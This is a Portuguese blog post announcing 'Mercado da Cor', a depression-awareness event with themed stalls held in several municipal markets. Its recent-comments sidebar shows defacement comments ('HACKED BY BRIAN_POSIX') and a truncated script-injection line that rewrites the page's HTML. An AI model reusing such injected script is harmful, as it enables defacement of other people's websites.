oqueaconteceporai @ 18:32

Ter, 22/01/13

No âmbito da campanha nacional “Saia do escuro. A depressão tem tratamento”, que se iniciou com um paint mob por várias cidades nacionais (Lisboa, Matosinhos, Coimbra, Évora e Faro), vai decorrer uma nova ação, denominada “Mercado da Cor”, em vários mercados municipais.

 

O Mercado da Cor terá duas componentes:

 

- Habitual mercado, com os seus vendedores e clientes habituais;

- Bancas criadas especificamente para esta ação que terão associados atividades e workshops. Cada uma destas quatro bancas será dedicada a áreas importantes na prevenção e controlo da depressão:

 

Banca da Descontração: aqui realizar-se-ão workshops sobre gestão de stress e do riso. Enquanto não decorrem os workshops, haverá especialistas disponíveis para informar sobre a influência de uma vida mais descontraída e social ativa para ultrapassar a depressão.

 

Banca da Atividade Física: terá a presença de um desportista popular que estará disponível para fornecer informação e dicas sobre atividade física. Aqui, com a ajuda dos próprios sacos das compras, convidam os visitantes a realizarem pequenos exercícios físicos, animando todo o mercado ao mesmo tempo que evidenciam a importância do exercício físico para ultrapassar a depressão.

 

Banca da Alimentação Saudável: aqui estarão nutricionistas que fornecerão dicas saudáveis e indicarão os melhores alimentos para uma vida melhor e que ajudam a ultrapassar a depressão. Em horários preestabelecidos, estará um chefe de cozinha que estará disponível para fornecer informação sobre a seleção e a confeção correta de alimentos saudáveis com a apresentação de um live cooking.

 

Banca Antidepressão: Na banca antidepressão será possível preencher um breve questionário sobre os sintomas da depressão. As pessoas serão depois encaminhadas para especialistas que dialogarão com elas acerca da depressão, as suas causas, os sintomas e o tratamento. Esta banca promoverá ainda sessões de esclarecimento sobre a depressão, as suas causas, os sintomas e o tratamento.

 

Em Lisboa o Mercado da Cor vai decorrer no Mercado da Ribeira entre as 9h e as 13h. O Mercado da Cor vai também ter continuidade a nível nacional nas restantes cidades (Matosinhos, Coimbra, Évora e Faro), mas em datas distintas. Mercado da Ribeira, 26 de Janeiro Mercado Municipal de Évora, 2 de Fevereiro Mercado Municipal de Faro, 9 de Fevereiro Mercado Municipal D. Pedro V, 16 de Fevereiro Mercado Municipal de Matosinhos, 23 de Fevereiro.

 

Não perca nada sobre este evento inovador, no mais Mulher desta quarta-feira! Às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO